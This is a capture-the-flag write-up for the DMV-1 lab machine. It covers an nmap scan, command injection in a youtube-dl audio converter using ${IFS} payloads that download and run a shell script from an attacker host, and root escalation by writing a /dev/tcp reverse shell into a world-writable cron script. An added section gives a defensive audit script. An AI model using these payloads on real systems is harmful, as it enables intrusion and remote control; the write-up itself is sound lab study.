DMV-1

Information gathering

Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-09 03:04 EST
Nmap scan report for 192.168.93.135
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_ 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:9E:3B:DC (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.93.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds

The page on port 80 looks like an audio conversion service.

Intercepting the request shows an error message, which reveals that a program called youtube-dl is in use.

Looking it up on GitHub, it is a project with some 87k stars.

Command execution to get a shell

Testing with intercepted requests shows that command execution is possible.

But spaces seem to cause problems, so try ${IFS} instead.

Tried a reverse shell: bash failed, python failed.

Try using wget to download a file to the target and run it.

1;wget${IFS}http://192.168.93.129/shell.txt;

1;bash${IFS}shell.txt;

Privilege escalation via a privileged file

There is only one user.

After uploading pspy64 we can see that the target automatically runs two files, both as root.

cloud-id runs as root and we can't touch it, but clean.sh is readable and writable by www-data.

So just write a bash reverse-shell command into it.

bash -i >& /dev/tcp/192.168.93.129/4444 0>&1

Wait for it to execute.
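The check behind this privilege escalation, as an added example that is not from the writeup or from pspy: once pspy shows root executing scripts on a schedule, the question is which of those scripts an unprivileged user can modify, because any such script is a root shell for that user (the clean.sh case above). The directory, file names and permissions below are constructed to mirror the writeup; the real cron path on the box is not stated on this page.

```sh
#!/bin/sh
# Added example, not the DMV-1 writeup's code. Enumerates scripts that root
# runs but others can write, then shows the remediation.

# Print the basename of every regular file under DIR that is world-writable.
# Mode bits are checked rather than "test -w", so the result does not change
# depending on who runs the audit (as root, -w is always true). Files owned
# by, or group-writable for, the service account matter just as much.
find_world_writable() {
  find "$1" -type f -perm -002 | sed 's|.*/||' | sort
}

# Remediation: drop the write bit for others. Ownership should be root:root
# as well; chown is left out so the demo runs unprivileged.
harden_scripts() {
  find "$1" -type f -perm -002 -exec chmod o-w {} +
}

# Constructed scenario (hypothetical paths): a root-only cloud-id and a
# clean.sh that anyone can edit, like the two files pspy showed.
DEMO_DIR=$(mktemp -d)
printf '#!/bin/sh\necho cloud-id\n' > "$DEMO_DIR/cloud-id"
printf '#!/bin/sh\necho cleaning\n' > "$DEMO_DIR/clean.sh"
chmod 755 "$DEMO_DIR/cloud-id"
chmod 777 "$DEMO_DIR/clean.sh"

before=$(find_world_writable "$DEMO_DIR")   # clean.sh
harden_scripts "$DEMO_DIR"
after=$(find_world_writable "$DEMO_DIR")    # (empty)
printf 'writable before hardening: [%s]\nafter: [%s]\n' "$before" "$after"
```

On a real target the directories to feed `find_world_writable` are the cron locations (`/etc/cron.d`, `/etc/cron.*`, crontab entries) plus whatever paths pspy reports root executing; the attacker's write of a reverse shell into clean.sh and the defender's `chmod o-w` are two sides of the same finding.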

The second flag is found in root's directory.